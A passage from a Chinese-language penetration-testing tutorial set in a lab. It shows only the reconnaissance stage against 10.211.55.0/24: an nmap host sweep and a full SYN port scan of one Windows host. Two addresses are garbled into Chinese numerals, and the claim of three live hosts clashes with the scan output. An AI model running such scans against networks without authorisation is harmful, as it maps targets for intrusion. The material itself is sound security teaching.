內網滲透從入門到入獄

場景：

客戶要求你對他們內網作一次安全評估，你接了這個活，搞清楚客戶需求：（不影響業務，不限制攻擊手段，目標是獲取服務器權限），給了你一個IP段：10.211.55.1/24

滲透測試流程

信息收集

須要對你的滲透測試環境網絡進行配置

探測存活主機

Nmap

(base) ➜ ~ Nmap -Pn 10.211.55.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CSTNmap scan report for 10.211.55.0Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.0 are filteredNmap scan report for 10.211.55.1Host is up.All 1000 scanned ports on 10.211.55.1 are filtered
Nmap scan report for 10.211.55.2Host is up (0.0013s latency).All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for 10.211.55.4Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.4 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00068s latency).Not shown: 997 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00085s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http
Nmap scan report for 10.211.55.7Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.0011s latency).Not shown: 991 filtered portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknown
Nmap scan report for 10.211.55.9Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.9 are filtered
Nmap scan report for 10.211.55.10Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.10 are filtered
Nmap scan report for 10.211.55.11Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.11 are filtered
Nmap scan report for 10.211.55.12Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.12 are filtered
Nmap scan report for 10.211.55.13Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.13 are filtered
Nmap scan report for 10.211.55.14Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.14 are filtered
Nmap scan report for 10.211.55.15Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.15 are filtered
Nmap scan report for 10.211.55.16Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.16 are filtered
Nmap scan report for 10.211.55.17Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.17 are filtered
Nmap scan report for 10.211.55.18Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.18 are filtered
Nmap scan report for 10.211.55.19Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.19 are filtered
Nmap scan report for 10.211.55.20Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.20 are filtered
Nmap scan report for 10.211.55.21Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.21 are filtered
Nmap scan report for 10.211.55.22Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.22 are filtered
Nmap scan report for 10.211.55.23Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.23 are filtered
Nmap scan report for 10.211.55.24Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.24 are filtered
Nmap scan report for 10.211.55.25Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.25 are filtered
Nmap scan report for 10.211.55.26Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.26 are filtered
Nmap scan report for 10.211.55.27Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.27 are filtered
Nmap scan report for 10.211.55.28Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.28 are filtered
Nmap scan report for 10.211.55.29Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.29 are filtered
Nmap scan report for 10.211.55.30Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.30 are filtered
Nmap scan report for 10.211.55.31Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.31 are filtered
Nmap scan report for 10.211.55.32Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.32 are filtered
Nmap scan report for 10.211.55.33Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.33 are filtered
Nmap scan report for 10.211.55.34Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.34 are filtered
Nmap scan report for 10.211.55.35Host is up (0.000019s latency).All 1000 scanned ports on 10.211.55.35 are filtered
Nmap scan report for 10.211.55.36Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.36 are filtered
Nmap scan report for 10.211.55.37Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.37 are filtered
Nmap scan report for 10.211.55.38Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.38 are filtered
Nmap scan report for 10.211.55.39Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.39 are filtered
Nmap scan report for 10.211.55.40Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.40 are filtered
Nmap scan report for 10.211.55.41Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.41 are filtered
Nmap scan report for 10.211.55.42Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.42 are filtered
Nmap scan report for 10.211.55.43Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.43 are filtered
Nmap scan report for 10.211.55.44Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.44 are filtered
Nmap scan report for 10.211.55.45Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.45 are filtered
Nmap scan report for 10.211.55.46Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.46 are filtered
Nmap scan report for 10.211.55.47Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.47 are filtered
Nmap scan report for 10.211.55.48Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.48 are filtered
Nmap scan report for 10.211.55.49Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.49 are filtered
Nmap scan report for 10.211.55.50Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.50 are filtered
Nmap scan report for 10.211.55.51Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.51 are filtered
Nmap scan report for 10.211.55.52Host is up (0.000016s latency).All 1000 scanned ports on 10.211.55.52 are filtered
Nmap scan report for 10.211.55.53Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.53 are filtered
Nmap scan report for 10.211.55.54Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.54 are filtered
Nmap scan report for 10.211.55.55Host is up (0.000018s latency).All 1000 scanned ports on 10.211.55.55 are filtered
Nmap scan report for 10.211.55.56Host is up (0.000017s latency).All 1000 scanned ports on 10.211.55.56 are filtered
Nmap scan report for 10.211.55.57Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.57 are filtered
Nmap scan report for 10.211.55.58Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.58 are filtered
Nmap scan report for 10.211.55.59Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.59 are filtered
Nmap scan report for 10.211.55.60Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.60 are filtered
Nmap scan report for 10.211.55.61Host is up (0.000035s latency).All 1000 scanned ports on 10.211.55.61 are filtered
Nmap scan report for 10.211.55.62Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.62 are filtered
Nmap scan report for 10.211.55.63Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.63 are filtered
Nmap scan report for 10.211.55.64Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.64 are filtered
Nmap scan report for 10.211.55.65Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.65 are filtered
Nmap scan report for 10.211.55.66Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.66 are filtered
Nmap scan report for 10.211.55.67Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.67 are filtered
Nmap scan report for 10.211.55.68Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.68 are filtered
Nmap scan report for 10.211.55.69Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.69 are filtered
Nmap scan report for 10.211.55.70Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.70 are filtered
Nmap scan report for 10.211.55.71Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.71 are filtered
Nmap scan report for 10.211.55.72Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.72 are filtered
Nmap scan report for 10.211.55.73Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.73 are filtered
Nmap scan report for 10.211.55.74Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.74 are filtered
Nmap scan report for 10.211.55.75Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.75 are filtered
Nmap scan report for 10.211.55.76Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.76 are filtered
Nmap scan report for 10.211.55.77Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.77 are filtered
Nmap scan report for 10.211.55.78Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.78 are filtered
Nmap scan report for 10.211.55.79Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.79 are filtered
Nmap scan report for 10.211.55.80Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.80 are filtered
Nmap scan report for 10.211.55.81Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.81 are filtered
Nmap scan report for 10.211.55.82Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.82 are filtered
Nmap scan report for 10.211.55.83Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.83 are filtered
Nmap scan report for 10.211.55.84Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.84 are filtered
Nmap scan report for 10.211.55.85Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.85 are filtered
Nmap scan report for 10.211.55.86Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.86 are filtered
Nmap scan report for 10.211.55.87Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.87 are filtered
Nmap scan report for 10.211.55.88Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.88 are filtered
Nmap scan report for 10.211.55.89Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.89 are filtered
Nmap scan report for 10.211.55.90Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.90 are filtered
Nmap scan report for 10.211.55.91Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.91 are filtered
Nmap scan report for 10.211.55.92Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.92 are filtered
Nmap scan report for 10.211.55.93Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.93 are filtered
Nmap scan report for 10.211.55.94Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.94 are filtered
Nmap scan report for 10.211.55.95Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.95 are filtered
Nmap scan report for 10.211.55.96Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.96 are filtered
Nmap scan report for 10.211.55.97Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.97 are filtered
Nmap scan report for 10.211.55.98Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.98 are filtered
Nmap scan report for 10.211.55.99Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.99 are filtered
Nmap scan report for 10.211.55.100Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.100 are filtered
Nmap scan report for 10.211.55.101Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.101 are filtered
Nmap scan report for 10.211.55.102Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.102 are filtered
Nmap scan report for 10.211.55.103Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.103 are filtered
Nmap scan report for 10.211.55.104Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.104 are filtered
Nmap scan report for 10.211.55.105Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.105 are filtered
Nmap scan report for 10.211.55.106Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.106 are filtered
Nmap scan report for 10.211.55.107Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.107 are filtered
Nmap scan report for 10.211.55.108Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.108 are filtered
Nmap scan report for 10.211.55.109Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.109 are filtered
Nmap scan report for 10.211.55.110Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.110 are filtered
Nmap scan report for 10.211.55.111Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.111 are filtered
Nmap scan report for 10.211.55.112Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.112 are filtered
Nmap scan report for 10.211.55.113Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.113 are filtered
Nmap scan report for 10.211.55.114Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.114 are filtered
Nmap scan report for 10.211.55.115Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.115 are filtered
Nmap scan report for 10.211.55.116Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.116 are filtered
Nmap scan report for 10.211.55.117Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.117 are filtered
Nmap scan report for 10.211.55.118Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.118 are filtered
Nmap scan report for 10.211.55.119Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.119 are filtered
Nmap scan report for 10.211.55.120Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.120 are filtered
Nmap scan report for 10.211.55.121Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.121 are filtered
Nmap scan report for 10.211.55.122Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.122 are filtered
Nmap scan report for 10.211.55.123Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.123 are filtered
Nmap scan report for 10.211.55.124Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.124 are filtered
Nmap scan report for 10.211.55.125Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.125 are filtered
Nmap scan report for 10.211.55.126Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.126 are filtered
Nmap scan report for 10.211.55.127Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.127 are filtered
Nmap scan report for 10.211.55.128Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.128 are filtered
Nmap scan report for 10.211.55.129Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.129 are filtered
Nmap scan report for 10.211.55.130Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.161 are filtered
Nmap scan report for 10.211.55.162Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203Host is up (0.00063s latency).All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251Host is up (0.000032s latency).All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds(base) ➜ ~

通過探測發現該IP段有3個存活主機

分別是：10.211.55.五、10.211.55.六、10.211.55.8

對這三個主機進行全端口掃描，查看三臺主機開放端口狀況

10.211.55.5

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CSTInitiating ARP Ping Scan at 19:37Scanning 10.211.55.5 [1 port]Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:37Scanning windows-10.shared (10.211.55.5) [65535 ports]Discovered open port 135/tcp on 10.211.55.5Discovered open port 139/tcp on 10.211.55.5Discovered open port 445/tcp on 10.211.55.5Discovered open port 49664/tcp on 10.211.55.5Discovered open port 49669/tcp on 10.211.55.5Discovered open port 5040/tcp on 10.211.55.5Discovered open port 49667/tcp on 10.211.55.5Discovered open port 49668/tcp on 10.211.55.5Discovered open port 49665/tcp on 10.211.55.5Discovered open port 49671/tcp on 10.211.55.5Discovered open port 49666/tcp on 10.211.55.5Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00018s latency).Not shown: 65524 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5040/tcp open unknown49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49671/tcp open unknownMAC Address: 